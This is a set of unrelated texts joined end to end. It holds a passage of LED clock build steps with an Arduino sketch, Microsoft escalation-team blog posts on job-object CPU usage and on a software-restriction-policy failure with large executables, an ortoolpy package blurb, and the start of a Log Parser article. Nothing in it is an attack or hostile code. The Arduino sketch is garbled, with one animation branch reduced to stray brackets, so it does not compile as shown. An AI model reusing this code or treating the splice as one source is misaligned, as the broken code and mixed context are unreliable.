Cut out 9 segments from the "Segment 3" template attached out of 3/8 in. thick scrapwood (found in step 26). Glue them so the seams from Segment 2 are in the middle of each Segment 3. This will strengthen the ring.
Step 16: Smooth Ring and Paint
I made a custom sanding block out of the offcut piece of the large ring. Sand the inside and outside of the ring and fill any cracks that may have appeared during the glue up process.
Once smooth, apply a few coats of black paint and clear coat.
Step 17: Cut Acrylic
Cut the acrylic to a square measuring 30 x 30 in. and mark the center. Attach the acrylic with double sided tape. Using a flush trim router bit, remove the excess acrylic
Step 18: Apply Window Tint
In a dust free environment, remove the protective film from the acrylic. Apply spray and remove backing from the window tint. Apply window tint sticky side down. Using a squeegee or credit card, squeeze out all the liquid from under the window tint. Once all bubbles and wrinkles have been removed, trim the excess window tint using a sharp knife.
Step 19: Attach Diffuser
I used a large piece of butcher paper to act as a diffuser. Lay out the paper on a flat surface. Cover the face of the frame with glue from a glue stick. Before the glue dries, lay the front of the clock face down on the paper and rough cut the excess. Once dry, use a sharp knife to trim flush.
Step 20: Apply Insulation
I used electrical tape to keep the power and data lines separate.
Step 21: Assemble
Remove the other protective layer from the acrylic. Place the acrylic inside the ring with the window tint side up. Slide the remainder of the clock into the ring. Use a clamp to apply light pressure while a hole is drilled through the ring and into the LED board. This should be roughly 1 1/8 in. from the back. Be careful not to drill into an LED. Screw a truss head screw into the hole. Repeat for a total of eight screws around the perimeter of the clock.
Step 22: Attach Anchor Points
Glue anchor points to the back of the clock for the back cover to attach to. These are 3/4 in. thick and about 2 in. long.
Step 23: Drill Power and LDR Sensor Holes
Drill a power hole through the bottom of the clock for the power plug and a hole in the top for the light dependent resistor (LDR) sensor.
Step 24: Install Electronics Holder
Install the 3D printed holder for the RTC and Arduino Nano. Connect all electronics as shown in the schematic.
Step 25: Back Cover
Cut a back cover from thin plywood just smaller than the outside of the clock. Drill holes into the anchor points. Find the center of the back and measure out 8 inches in either direction to cut keyholes (standard 16 in centers for studs in the US). I drilled the main hole just larger than the head of the screws I'm going to use and filed the hole larger in one direction. Paint black and attach the cover in place.
Step 26: Code and Files
Again, I'm fairly new to using many of the Arduino libraries used here so I'm sure there are better ways to utilize them.
I wrote the code to be easily updated based on how many LEDs you are using if the project is scaled up or down. All you need to do is update the LED starting and ending positions as well as how many LEDs are part of each digit.
I've added a few animations that play at startup as well as on the hour. They are pseudo-random, based on the board's random number generator.
You can set the clock to cycle through colors or stay static at one. You can even highlight the indicator digit to help read time as shown in the introduction.
Feel free to edit and change the code as you wish.
#include "RTClib.h" #include <FastLED.h> #define NUM_LEDS 96 #define DATA_PIN 3 #define LDR A0 RTC_DS1307 rtc; boolean timeChange = false; boolean printTime = false; // Set to true if you want to see output in the console. Helpful for debugging. boolean redDown = true; boolean greenDown = false; boolean blueDown = false; boolean cycle = false; // Set true if you want clock colors to cycle boolean highlight = true; // Set true to highlight 'last digit'. // Locations of the start and end of each group of time const int SECOND_1_LOCATION = 0; const int HOUR_2_START_LOCATION = 1; const int HOUR_2_END_LOCATION = 8; const int HOUR_1_START_LOCATION = 9; const int HOUR_1_END_LOCATION = 20; const int MINUTE_2_START_LOCATION = 21; const int MINUTE_2_END_LOCATION = 42; const int MINUTE_1_START_LOCATION = 43; const int MINUTE_1_END_LOCATION = 66; const int SECOND_2_START_LOCATION = 67; const int SECOND_2_END_LOCATION = 95; const int LEDS_PER_HOUR_1 = 3; const int LEDS_PER_HOUR_2 = 2; const int LEDS_PER_MINUTE_1 = 6; const int LEDS_PER_MINUTE_2 = 2; // Multipliers used to split up time const int MULTIPLIER_FIVE = 5; const int MULTIPLIER_TWO = 2; const int START_UP_DELAY = 1; // Change this to speed up or slow down startup animation const int CYCLE_SPEED = 1; // Change the rate here for color changing cycle (must be above 1) // Declare variables int lastSecond = 0; int currentHour = 0; int currentMinute = 0; int currentSecond = 0; int hour1 = 0; int hour2 = 0; int minute1 = 0; int minute2 = 0; int second1 = 0; int second2 = 0; int cycleCount = 1; float fadeValue = 255; float fadeCheck = 255; uint8_t bright = 255; int numberOfAnimations = 5; int randomness = 0; // Set Colors uint8_t red = 0; uint8_t green = 0; uint8_t blue = 255; uint8_t highlight_red = 60; uint8_t highlight_green = 60; uint8_t highlight_blue = 255; // Define the array of leds CRGB leds[NUM_LEDS]; void setup() { Serial.begin(19200); FastLED.addLeds<WS2811, DATA_PIN, RGB>(leds, NUM_LEDS); LEDS.setBrightness(bright); FastLED.clear(); rtc.begin(); // Uncomment line below to set time. // rtc.adjust(DateTime(2020, 2, 19, 23, 59, 50)); // rtc.adjust(DateTime(F(__DATE__), F(__TIME__))); // Startup animation animate(randomness); } void loop() { // Get time DateTime now = rtc.now(); currentHour = now.hour(); currentMinute = now.minute(); currentSecond = now.second(); timeChange = false; // Use these to manually set time without RTC. 
Helpful for debugging // currentHour = 5; // currentMinute = 30; // currentSecond = 30; // Reset all bits to zero for (int i = SECOND_1_LOCATION; i <= SECOND_2_END_LOCATION; i++) { leds[i] = CRGB::Black; } // Set Hour // Set hour 1 hour1 = (currentHour % MULTIPLIER_FIVE) * LEDS_PER_HOUR_1; // This will count the total LEDs of the time unit to light up for (int i = HOUR_1_START_LOCATION; i < (HOUR_1_START_LOCATION + hour1); i++) { leds[i] = CRGB( red, green, blue); } if (highlight == true && hour1 > 0)// && hour1 < 12) { for (int i = (HOUR_1_START_LOCATION + hour1 - 1); i >= (HOUR_1_START_LOCATION + hour1 - LEDS_PER_HOUR_1); i--) { leds[i] = CRGB( highlight_red, highlight_green, highlight_blue); } } // Set hour 2 hour2 = (currentHour / MULTIPLIER_FIVE) * LEDS_PER_HOUR_2; // This will count the total LEDs of the time unit to light up for (int i = HOUR_2_START_LOCATION; i < (HOUR_2_START_LOCATION + hour2); i++) { leds[i] = CRGB( red, green, blue); } if (highlight == true && hour2 > 0)// && hour2 < 8) { for (int i = (HOUR_2_START_LOCATION + hour2 - 1); i >= (HOUR_2_START_LOCATION + hour2 - LEDS_PER_HOUR_2); i--) { leds[i] = CRGB( highlight_red, highlight_green, highlight_blue); } } // Set Minute // Set minute 1 minute1 = (currentMinute % MULTIPLIER_FIVE) * LEDS_PER_MINUTE_1; // This will count the total LEDs of the time unit to light up for (int i = MINUTE_1_START_LOCATION; i < (MINUTE_1_START_LOCATION + minute1); i++) { leds[i] = CRGB( red, green, blue); } if (highlight == true && minute1 > 0)// && minute1 < 24) { for (int i = (MINUTE_1_START_LOCATION + minute1 - 1); i >= (MINUTE_1_START_LOCATION + minute1 - LEDS_PER_MINUTE_1); i--) { leds[i] = CRGB( highlight_red, highlight_green, highlight_blue); } } // Set minute 2 minute2 = (currentMinute / MULTIPLIER_FIVE) * LEDS_PER_MINUTE_2; // This will count the total LEDs of the time unit to light up for (int i = MINUTE_2_START_LOCATION; i < (MINUTE_2_START_LOCATION + minute2); i++) { leds[i] = CRGB( red, green, blue); } if (highlight == true && minute2 > 0)// && minute2 < 22) { for (int i = (MINUTE_2_START_LOCATION + minute2 - 1); i >= (MINUTE_2_START_LOCATION + minute2 - LEDS_PER_MINUTE_2); i--) { leds[i] = CRGB( highlight_red, highlight_green, highlight_blue); } } // Set Second if (currentSecond != lastSecond) { timeChange = true; } // Set second 1 second1 = currentSecond % MULTIPLIER_TWO; if (second1 == 1) { leds[SECOND_1_LOCATION] = CRGB( red, green, blue); } // Set second 2 second2 = currentSecond / MULTIPLIER_TWO; for (int i = SECOND_2_START_LOCATION; i < (SECOND_2_START_LOCATION + second2); i++) { leds[i] = CRGB( red, green, blue); } if (highlight == true && second2 > 0)// && second2 < 29) { for (int i = (SECOND_2_START_LOCATION + second2 - 1); i >= (SECOND_2_START_LOCATION + second2 - 1); i--) { leds[i] = CRGB( highlight_red, highlight_green, highlight_blue); } } lastSecond = currentSecond; // Count cycles of the program and call the setColor function to change the color of the LEDs ever CYCLE_SPEED cycles. if (cycleCount < CYCLE_SPEED) { cycleCount++; } else if (cycleCount == CYCLE_SPEED && cycle == true) { cycleCount++; setColor(cycle); } else { cycleCount = 0; } // Animate every hour randomness = random(numberOfAnimations); if (currentMinute == 0 && currentSecond == 0) { animate(randomness); } // This equation is creating using interpolation to determine the brightness. // I suggest leaving it commented unless you find the LEDs too bright at night. 
// If you want to change the brightness of your lights and want to create your own equation, // search 'Interpolation' online and jump feet first into the world of numerial analysis. // fadeValue = analogRead(LDR) * -.18 + 333.71; // float readin = analogRead(LDR); // Serial.println(readin); // Serial.println(fadeValue); // if (fadeValue > bright) // { // fadeValue = bright; // } // else if (fadeValue < 150) // { // fadeValue = 150; // } // LEDS.setBrightness(fadeValue); FastLED.show(); // Print current time to the console if (timeChange == true && printTime == true) { printToConsole(); } } // Animation function add more animations here as you wish void animate(int select) { if (select == 0) { for (int i = SECOND_1_LOCATION; i <= SECOND_2_END_LOCATION; i++) { leds[i] = CRGB( red, green, blue); FastLED.show(); delay(START_UP_DELAY); } for (int i = SECOND_2_END_LOCATION; i >= SECOND_1_LOCATION; i--) { leds[i] = CRGB::Black; FastLED.show(); delay(START_UP_DELAY); } } else if (select == 1) { for (int i = 0; i < 250; i++) { int light = random(95); leds[light] = CRGB( red, green, blue); FastLED.show(); } } else if (select == 2) { leds[0] = CRGB( red, green, blue); for (int i = 0; i <= SECOND_2_END_LOCATION - SECOND_2_START_LOCATION; i++) { leds[SECOND_2_START_LOCATION + i] = CRGB( red, green, blue); if (i <= (MINUTE_1_END_LOCATION - MINUTE_1_START_LOCATION)) { leds[MINUTE_1_START_LOCATION + i] = CRGB( red, green, blue); } if (i <= (MINUTE_2_END_LOCATION - MINUTE_2_START_LOCATION)) { leds[MINUTE_2_START_LOCATION + i] = CRGB( red, green, blue); } if (i <= (HOUR_1_END_LOCATION - HOUR_1_START_LOCATION)) { leds[HOUR_1_START_LOCATION + i] = CRGB( red, green, blue); } if (i <= (HOUR_2_END_LOCATION - HOUR_2_START_LOCATION)) { leds[HOUR_2_START_LOCATION + i] = CRGB( red, green, blue); } delay(34); FastLED.show(); } } else if (select == 3) { leds[0] = CRGB( red, green, blue); for (int i = 0; i <= SECOND_2_END_LOCATION - SECOND_2_START_LOCATION; i++) { leds[SECOND_2_END_LOCATION - i] = CRGB( red, green, blue); if (i <= (MINUTE_1_END_LOCATION - MINUTE_1_START_LOCATION)) { leds[MINUTE_1_END_LOCATION - i] = CRGB( red, green, blue); } if (i <= (MINUTE_2_END_LOCATION - MINUTE_2_START_LOCATION)) { leds[MINUTE_2_END_LOCATION - i] = CRGB( red, green, blue); } if (i <= (HOUR_1_END_LOCATION - HOUR_1_START_LOCATION)) { leds[HOUR_1_END_LOCATION - i] = CRGB( red, green, blue); } if (i <= (HOUR_2_END_LOCATION - HOUR_2_START_LOCATION)) { leds[HOUR_2_END_LOCATION - i] = CRGB( red, green, blue); } delay(34); FastLED.show(); } } else if (select == 4) {); } } // Color cycling function void setColor(boolean cycleColors) { if (cycleColors == true) { if (redDown == true && greenDown == false) { red++; green--; if (green <= 0) { red = 255; redDown = false; greenDown = true; } } else if (greenDown == true && blueDown == false) { green++; blue--; if (blue <= 0) { green = 255; greenDown = false; blueDown = true; } } else if (blueDown == true && redDown == false) { blue++; red--; if (red <= 0) { blue = 255; blueDown = false; redDown = true; } } } else { red = 0; green = 0; blue = 255; } } // Print to Serial Monitor function void printToConsole() { Serial.print("Current Time: "); Serial.print(currentHour); Serial.print(":"); Serial.print(currentMinute); Serial.print(":"); Serial.println(currentSecond); Serial.println(" "); for (int i = HOUR_2_START_LOCATION; i <= HOUR_2_END_LOCATION; i++) { Serial.print(leds[i]); if (i % 2 == 0) { Serial.print(" "); } } Serial.println(" "); for (int i = HOUR_1_START_LOCATION; i <= 
HOUR_1_END_LOCATION; i++) { Serial.print(leds[i]); if (((i - HOUR_1_START_LOCATION + 1) % 3) == 0) { Serial.print(" "); } } Serial.println(" "); for (int i = MINUTE_2_START_LOCATION; i <= MINUTE_2_END_LOCATION; i++) { Serial.print(leds[i]); if (((i - MINUTE_2_START_LOCATION) + 1) % 2 == 0) { Serial.print(" "); } } Serial.println(" "); for (int i = MINUTE_1_START_LOCATION; i <= MINUTE_1_END_LOCATION; i++) { Serial.print(leds[i]); if (((i - MINUTE_1_START_LOCATION) + 1) % 6 == 0) { Serial.print(" "); } } Serial.println(" "); for (int i = SECOND_2_START_LOCATION; i <= SECOND_2_END_LOCATION; i++) { Serial.print(leds[i]); Serial.print(" "); } Serial.println(" "); Serial.println(leds[SECOND_1_LOCATION]); Serial.println(); for (int i = 0; i < NUM_LEDS; i++) { Serial.print(leds[i]); } Serial.println(); Serial.println(); }
Step 27: Enjoy!
In conclusion, this clock is wonderful to watch and once you get the hang of it, it's relatively easy to read. If you make your own clock project, let me know!
Working on the Global Escalation Services Team at Microsoft is really a cool gig. We’re privileged to work on several different Windows components at a very deep level so life is never boring. Here’s a list of the articles coming from the group in the next few weeks. Hope you enjoy!
Ron Stock
STORPORT Logging - Bob Golding discusses Storport logging. Beginning with the new versions, it is now possible to measure timing statistics for requests made to a system’s disk unit. These measurements are taken at the lowest possible level of OS interaction with the storage adapter hardware, making it much easier to diagnose storage performance issues.
Walking through a crash dump analysis – Chad Beeder walks through a debug.
Understanding !PTE Part 2 and Part 3 – Continuation of Ryan’s 3 part series
How DPM implements VSS – Dennis Middleton gives a high level view of how DPM implements the VSS API’s to manage replicas.
How Hyper-V does backups of running VM’s - Another article from Dennis
Pushlocks – Mark Lloyd discusses why it's important to use only published APIs.
Debugger Extension Blog – Ryan’s work with debugger extensions...
Hello folks, this is Pushkar and I recently worked an interesting case dealing with high CPU usage. What made it unusual was that the process consuming the CPU was not a business-critical application: I was tasked with identifying why a third-party performance monitoring tool was itself causing a performance issue on the server by consuming 100% of the CPU cycles. The irony of the situation made the case immensely interesting to me, and I decided to investigate it further. Typically, issues with third-party products are addressed by the application vendor.
In this case the monitoring tool, Monitor.exe (disclaimer: the identity of the actual product has been removed), was consistently consuming 100% of the CPU cycles, and as expected, if the tool was stopped, the CPU usage returned to normal. As I didn't have information about how the tool worked, I decided to gather data that would give me an idea of the underlying APIs the tool was calling, and with that an understanding of its behavior.
To begin troubleshooting, I gathered Kernrate.exe logs from the server along with a memory dump. On Windows Vista and later you can use the Windows Performance Toolkit (aka Xperf), a better alternative to Kernrate.
Note: To learn more about kernrate.exe check here
A quick review of the Kernrate log showed a lot of CPU time in the kernel, and the function hit most often was NtQueryDirectoryObject():
TOTAL K 0:07:35.343 (49.2%) U 0:02:40.734 (17.4%) I 0:05:09.171 (33.4%) DPC 0:00:52.984 (5.7%) Interrupt 0:00:20.312 (2.2%)
Total Interrupts= 4208713, Total Interrupt Rate= 9098/sec.
-----------------------------
Results for Kernel Mode:
OutputResults: KernelModuleCount = 106
Percentage in the following table is based on the Total Hits for the Kernel
ProfileTime 116300 hits, 65536 events per hit --------
Module Hits msec %Total Events/Sec
PROCESSR 45160 462654 38 % 6397017
NTOSKRNL 43573 462654 37 % 6172215
SYMMPI 18258 462654 15 % 2586287
----- Zoomed module NTOSKRNL.EXE (Bucket size = 16 bytes, Rounding Down) --------
Percentage in the following table is based on the Total Hits for this Zoom Module
ProfileTime 43573 hits, 65536 events per hit --------
NtQueryDirectoryObject 8433 462654 19 % 1194553
memmove 6584 462654 14 % 932638
KeInsertQueueDpc 5593 462654 12 % 792261
KeFlushMultipleTb 3118 462654 7 % 441671
Further investigation of the dump indicated that the function listed above was invoked to parse through the \BaseNamedObjects namespace in the kernel. BaseNamedObjects is a folder in the kernel object namespace where various kernel objects (events, semaphores, mutexes, waitable timers, file-mapping objects, and job objects) are created. The purpose of such a global namespace is to enable processes in multiple client sessions to communicate with a service application. Another use of such a namespace is for applications that use named objects to detect that an instance of the application is already running in the system, across all sessions.
I started looking under the \BaseNamedObjects namespace in the kernel and found a huge number of objects (over 2,900) under that namespace. You can use the Sysinternals tool WinObj.exe to browse the kernel object namespace and the objects within it. In my case I had no prior idea of the cause of the issue, so I had to look at the dump file. A snapshot of the WinObj.exe output is pasted below along with a stack from the kernel dump.
kd> !object \BaseNamedObjects
Object: fffffa8000d72ec0 Type: (fffffadfe7acb1e0) Directory
ObjectHeader: fffffa8000d72e90 (old version)
HandleCount: 36 PointerCount: 10275 <- This indicates the number of objects under this namespace
Directory Object: fffffa8000004060 Name: BaseNamedObjects
Hash Address Type Name
---- ------- ---- ----
00 fffffadfe5d79660 Job TestJobObj_9920
fffffadfe5d7a8e0 Job TestJobObj_9913
fffffadfe5d7b8e0 Job TestJobObj_9907
fffffadfe5d84060 Job TestJobObj_9850
fffffadfe5d863e0 Job TestJobObj_9843
fffffadfe5d873e0 Job TestJobObj_9837
fffffadfe5d8e060 Job TestJobObj_9790
fffffadfe5d903e0 Job TestJobObj_9783
fffffadfe5d913e0 Job TestJobObj_9777
fffffadfe5dad660 Job TestJobObj_9611
fffffadfe5dae660 Job TestJobObj_9605
fffffadfe5db7660 Job TestJobObj_9551
fffffadfe5db8660 Job TestJobObj_9545
fffffadfe5db98e0 Job TestJobObj_9538
<Snipped>
In my case the third party performance monitoring tool was experiencing high CPU when it queried the "Job Objects" and "Job Object Details" performance counters.
Since this was happening with a third party tool, I tried to recreate the issue in-house, and wrote a small utility to create a lot of Named Job Objects under \BaseNamedObjects namespace using CreateJobObject() API. Then I tried to use the plain old Perfmon tool built into Windows. The moment I tried to add the “Job Objects” & “Job Object Details” counters, the CPU utilization from MMC.EXE hit 90% (Perfmon runs as an MMC). Now I could reproduce the issue in-house so I investigated what happened when we try to query those counters.
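For reference, the object-creation side of the repro boiled down to something like the following sketch (the names mirror the TestJobObj_N objects visible in the dump above; error handling is trimmed):

#include <windows.h>
#include <stdio.h>

int main()
{
    // Create a large number of named job objects under \BaseNamedObjects.
    for (int i = 0; i < 10000; i++)
    {
        WCHAR name[64];
        swprintf_s(name, L"TestJobObj_%d", i);
        if (CreateJobObjectW(NULL, name) == NULL)
        {
            printf("CreateJobObject failed: %lu\n", GetLastError());
            break;
        }
        // Handles are deliberately not closed so the objects stay alive.
    }
    printf("Objects created; check \\BaseNamedObjects in WinObj.\n");
    getchar();  // Keep the process (and its objects) alive while querying.
    return 0;
}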
Here is what I found:
When we attempt to query the Job Object or Job Object Details performance counters, the following functions (respectively) are invoked in Perfproc.dll. They call NtQueryDirectoryObject() to locate the objects under the \BaseNamedObjects namespace, and then QueryInformationJobObject() to gather the performance data for each of those objects. One of the thread stacks is shown below to illustrate the flow.
CollectJobDetailData()
CollectJobObjectData()
kd> kb
RetAddr : Args to Child : Call Site
fffff800`01040abd : 00000000`000ad490 fffff800`01385b47 00000000`00002990 00000000`00000000 : nt!NtQueryInformationJobObject
00000000`77ef171a : 00000000`77d423cb 00000000`000ad498 00000000`00000000 00000000`c0000135 : nt!KiSystemServiceCopyEnd+0x3
00000000`77d423cb : 00000000`000ad498 00000000`00000000 00000000`c0000135 00000000`00000000 : ntdll!ZwQueryInformationJobObject+0xa
000007ff`5a794a16 : 00000000`000ad990 00000000`00000008 00000000`00000400 00000000`000addf8 : kernel32!QueryInformationJobObject+0x77
000007ff`5a7932b9 : 00000000`0000dd20 000007ff`5a79aa84 00000000`00000001 00000000`00000040 : perfproc!CollectJobObjectData+0x356
000007ff`7feeb497 : 00000000`00000000 00000000`000adee0 00000000`00000000 00000000`00000001 : perfproc!CollectSysProcessObjectData+0x1f9
000007ff`7fef09d1 : 00000000`000ae1d0 00000000`00000000 00000000`0000007a 00000000`00000000 : ADVAPI32!QueryExtensibleData+0x951
000007ff`7fef0655 : 0039002d`00350038 00000000`77c43cbd 00000000`00000000 00000000`00000000 : ADVAPI32!PerfRegQueryValue+0x66d
000007ff`7ff0b787 : 00000000`00000000 00000000`00000000 00000000`000ae8a0 00000000`000ae888 : ADVAPI32!LocalBaseRegQueryValue+0x356
000007ff`5b17ba27 : 00009ae8`b8ee62a9 00000000`000c46a0 00000000`00200000 00000000`00000000 : ADVAPI32!RegQueryValueExW+0xe9
You can determine the type of performance data queried for each Job Object in Win32_PerfFormattedData_PerfProc_JobObject Class. Although it documents a WMI interface for querying the Performance Data, it represents the same data set the native API also queries.
Once I understood what was happening under the hood, it was easy to deduce that every iteration of the query would be a CPU-intensive operation: for each object we run a nested query for the performance data described in the document above. If the number of items is large, and we are running a broad query of the nature "All Counters" and "All Instances", then every single iteration consumes a lot of CPU. To validate this, I got help from one of my colleagues, Steve Heller, who modified the sample code received from the vendor of the monitoring tool (which demonstrated what they were doing). We noticed it was querying this information every 2.5 seconds. The sample tool demonstrated that with about 10,000 job objects, a single iteration of the query took roughly 12.5 seconds to complete. No wonder the CPU usage remained high: before a single iteration of the query for all the job objects could finish, four additional queries were already queued, and the CPU usage continued to sit at 90% or more.
The conclusion that can be drawn from this test is that querying \BaseNamedObjects namespace with a large number of objects under it will invariably result in a fair amount of CPU usage. This could get worse if the query is performed for complex objects e.g., Job Objects for which we would run nested queries for individual Performance Data for each Job Object, and if the data is queried too frequently.
The two aspects responsible for the high CPU usage are:
1. The frequency at which the Performance Data was being queried
2. The number of objects under \BaseNamedObjects namespace.
Though there is no documented limit on the number of objects that can be created under the various kernel object namespaces, the absence of such a limit doesn't mean we should simply create a lot of objects. Applications should be designed carefully to use such kernel resources judiciously.
At the same time, just because the interfaces for querying performance data are publicly available doesn't mean we should query them at a very high frequency. Certain operations can be CPU intensive, as we have seen here, and we should identify what we really want to query and at what frequency.
Quoting from the MSDN article Job Objects:
“A job object allows groups of processes to be managed as a unit. Job objects are namable, securable, sharable objects that control attributes of the processes associated with them. Operations performed on the job object affect all processes associated with the job object.”
The above point clearly indicates that the Job Object Framework is intended for processes which are participating in a Job to monitor and control each other’s resource usage.
There could be different reasons for which a system administrator needs to gather information about the resource usage of a particular process. One of them could be meeting a Service Level Agreement. In that case we can monitor the individual processes running on the server with the counters available under "Performance Object -> Process".
Equipped with the knowledge that querying performance data for job objects may result in excessive CPU usage on the server, an administrator should evaluate (or consult the application owner, if needed) whether they really need to gather this performance data.
The following documents are available to help application developers create application-specific namespaces. Creating a private namespace and creating objects under it ensures that application-specific objects are not exposed to the Performance Library, because they won't appear under the \BaseNamedObjects namespace.
Object Namespaces
CreatePrivateNamespace Function
Job Objects
CreateJobObject Function
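To illustrate the pattern those documents describe, here is a minimal C sketch (names such as MyAppBoundary, MyAppNs, and MyJob are hypothetical, and error handling is abbreviated):

#include <windows.h>
#include <stdio.h>

int main(void)
{
    /* A boundary descriptor plus a SID define who may open the namespace. */
    HANDLE hBoundary = CreateBoundaryDescriptorW(L"MyAppBoundary", 0);

    SID_IDENTIFIER_AUTHORITY worldAuth = SECURITY_WORLD_SID_AUTHORITY;
    PSID pWorldSid = NULL;
    AllocateAndInitializeSid(&worldAuth, 1, SECURITY_WORLD_RID,
                             0, 0, 0, 0, 0, 0, 0, &pWorldSid);
    AddSIDToBoundaryDescriptor(&hBoundary, pWorldSid);

    /* Objects created under this prefix live outside \BaseNamedObjects. */
    HANDLE hNamespace = CreatePrivateNamespaceW(NULL, hBoundary, L"MyAppNs");
    if (hNamespace == NULL)
    {
        printf("CreatePrivateNamespace failed: %lu\n", GetLastError());
        return 1;
    }

    /* The job object's name is qualified by the private namespace prefix. */
    HANDLE hJob = CreateJobObjectW(NULL, L"MyAppNs\\MyJob");
    printf("Job created: %p\n", (void*)hJob);

    /* ... use the job ... */

    CloseHandle(hJob);
    ClosePrivateNamespace(hNamespace, 0);
    FreeSid(pWorldSid);
    DeleteBoundaryDescriptor(hBoundary);
    return 0;
}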
This problem is predominantly noticed on older systems. To mitigate it to a certain extent, Windows Vista (and all later operating systems) has a per-session BaseNamedObjects namespace (i.e., application-specific objects are created under a namespace of the form \Sessions\<SessionID>\BaseNamedObjects). Hence these objects are not exposed to the Performance Libraries and cannot be queried via Performance Monitoring tools. Unfortunately, the kernel changes required to make this work are too intricate to be back-ported to Windows 2003 SP2.
This brings me to the end of this post. I hope this information gives you better insight into how an oversight in an application's design can break other components at a later stage.
Recently I received a debugging request for a customer having problems running large executables. On their systems, they could run most EXEs without any problems, but they had two programs that were over 1.8 GB which, when run, would display the following error:
If they tried to run them in a command prompt, they received the message “Access is denied.” Both attempts were made with an administrator account and in neither case were the processes created. Through testing, they found that the programs worked if they were scheduled to run as System and also worked when run in safe mode as an administrator.
When the case was brought to my attention, it was noted that when the failing executables were run, the following appeared in process monitor logs:
The engineer did not see this when one of the problematic EXEs was run (successfully) on his test machine. The customer provided a VM image of their system which we set up in HyperV with a named pipe kernel debugger. I then started kernel debugging to find the cause of the INVALID PARAMETER error, hoping that resolving it would fix the issue.
To start, I looked at the call stack within process monitor for the invalid parameter:
The problem is this isn't exactly where we return invalid parameter. Looking at the source code for Fltmgr, it doesn't return invalid parameter; this was just where the error was caught in procmon. This call stack did provide some ideas for good starting places to debug, however. First, I looked up the hex value for STATUS_INVALID_PARAMETER in ntstatus.h: 0xC000000D. Knowing this, I decided to set a breakpoint on nt!IofCallDriver and ran the program. Once the debugger broke in, I planned to use wt -oR, which traces through the calls, displaying the return values next to each call. From there, I would just need to find 0xC000000D in the return column. Unfortunately, what I had forgotten was that wt does not display return codes in kernel debugging, only when debugging user mode.
With wt not an option, I decided to use a combination of debugger commands to approximate the output of wt. I knew the return value I was looking for, and I was also confident that I would find that code in the EAX register after the problem occurred. As such, I needed to write a loop that would walk through the instructions until it found 0xC000000D in EAX. The debugger provides two main options for walking instructions: p and t. p (Step) will execute a single instruction and display the register values. If the instruction is a call, it will not enter that function, but just display the results after that subroutine has been executed. t (Trace) also executes a single instruction, but it will enter into the function and will display each instruction.
In this case I wanted trace so I could see which function was returning the invalid parameter status. Tracing through that many instructions/functions would take a long time, but there are some variations on t (and p) that can help. tc (or pc) will execute instructions until a call statement is reached, where it will break and show the register values. tt (or pt) will execute instructions until a return instruction is reached. tct (or pct) will run until either a call or a return is reached. In this case, I opted for tct.
Knowing that I would use tct, I had to find a way to execute tct statements until EAX was the value I was looking for. This can be accomplished with the z (While) debugger command. The syntax is pretty easy, it’s just z(expression) and it works just like a do-while loop. Putting it all together, I used this command in the debugger:
tct; z(eax!=0xc000000d)
I then waited for the debugger to break in so I could see where this status was being thrown. Regrettably, the code called ended up going in to some recursion which made my while loop take way too long. To resolve this, I set a new breakpoint just before we entered the recursion, reran the program, used p to step past the call then ran the tct loop.
This time I was quickly brought to the code I was looking for. As soon as it broke in, I ran k to view the callstack:
kd> k
If we look at the assembly around Ntfs!NtfsCommonDeviceControl+0x40, we see that only if our return from NtfsDecodeFileObject is not equal to 4 does it move 0xC000000D into esi, and then move esi into eax:
I looked at the source code for these functions, and it didn’t make sense that a failure here would cause the problems we were seeing; especially specific to large executables. Out of curiosity I ran notepad on the VM again with procmon and found that it too displayed INVALID PARAMETER, but the program started and ran correctly:
Since this wasn’t the problem, I stopped reviewing the code and decided on a new approach. We knew that when running the EXE in a command prompt we received an “Access is denied message”. At that point it made sense to switch to user mode debugging and take a look at the cmd.exe process that was trying to launch install.exe
Doing user mode debugging in a VM can be a bit of a challenge, especially if you are trying to minimize changes to the VM (and in my case, avoid putting any symbols on the customer’s VM image). Since I already had a kernel debugger attached, one option would be to run ntsd.exe (debugger provided in the Debugging Tools for Windows) on the VM with the -p switch specifying the PID of the cmd.exe process I wanted to debug and -d switch which forwards the i/o of ntsd to the kernel debugger. The problem with this approach is the kernel debugger just becomes a front end for issuing commands and seeing the output from ntsd. That means all symbol resolution is still done on the target system running ntsd.
I didn’t want to give the customer VM Internet or corporate network access, so I instead opted to run dbgsrv.exe on the VM. Running “dbgsrv -t tcp:port=9999” tells the debug server to listen on TCP port 9999 for debugger connections. Then, on the HyperV server computer I could just run windbg -premote tcp:server=(IP of VM),port=9999 -p (PID of cmd on VM) to debug it.
I suspected that we may be calling CreateProcess but it was failing, so I set a breakpoint on kernel32!CreateProcessW. Sure enough, it hit when I tried to run install.exe in the command prompt:
This time I could use wt -oR since this was a usermode debug. Looking in ntstatus.h again, the code for STATUS_ACCESS_DENIED is 0xC0000022. Running wt can take a very long time, so I used the -l switch, which limits the number of levels deep it will display. This would be something like using tct as I did above until you were a few calls deep then using pct. Using wt -l 3 -oR gave me the following:
…
Now we are getting close! I set a new breakpoint for kernel32!BasepCheckWinSaferRestrictions and reran the test. This gave me the following line:
63 0 [ 3] ADVAPI32!__CodeAuthzpCheckIdentityHashRules eax = ffffffff`c0000022
One last run with a new breakpoint at ADVAPI32!__CodeAuthzpCheckIdentityHashRules and I found what I was looking for:
58 218 [ 1] ADVAPI32!__CodeAuthzpEnsureMapped eax = ffffffff`c0000022
The depth is shown in brackets. As this call was 1 deep from __CodeAuthzpCheckIdentityHashRules and I was using 3 as my maximum depth in wt, I knew this was where the STATUS_ACCESS_DENIED was coming from. I reviewed the source code and found that this is the code that performs Software Restriction Policy checking. Specifically, we were attempting to map the executable into memory to perform hash checking on it. Since there wasn't 1.8 GB of contiguous available memory, it failed. Looking at the VM, I discovered that the customer had implemented a number of software restriction policies. As a test, I removed their restrictions on the VM, and the programs ran successfully. A search of the KB revealed that a hotfix was published for this problem: 973825. Installing the hotfix in the article also resolved the issue with their policies intact.
-Matt Burrough
Project Description
ortoolpy is a package for Operations Research.
from ortoolpy import knapsack

size = [21, 11, 15, 9, 34, 25, 41, 52]
weight = [22, 12, 16, 10, 35, 26, 42, 53]
capacity = 100
knapsack(size, weight, capacity)
Requirements
- Python 3, numpy, pandas, matplotlib, networkx, pulp
Features
- This is a sample. So it may not be efficient.
Setup
$ pip install ortoolpy
History
0.0.1 (2015-6-26)
- first release
There are some amazing utilities available which never seem to get much recognition. One of these, in my opinion, is Microsoft's Log Parser; you can download v2.2 from here and find an introduction here. It gives you the ability to use SQL-like queries on common log files. While it is presented as a command line program, most of the work is done by the accompanying DLL, so would it be possible to access it from Python?
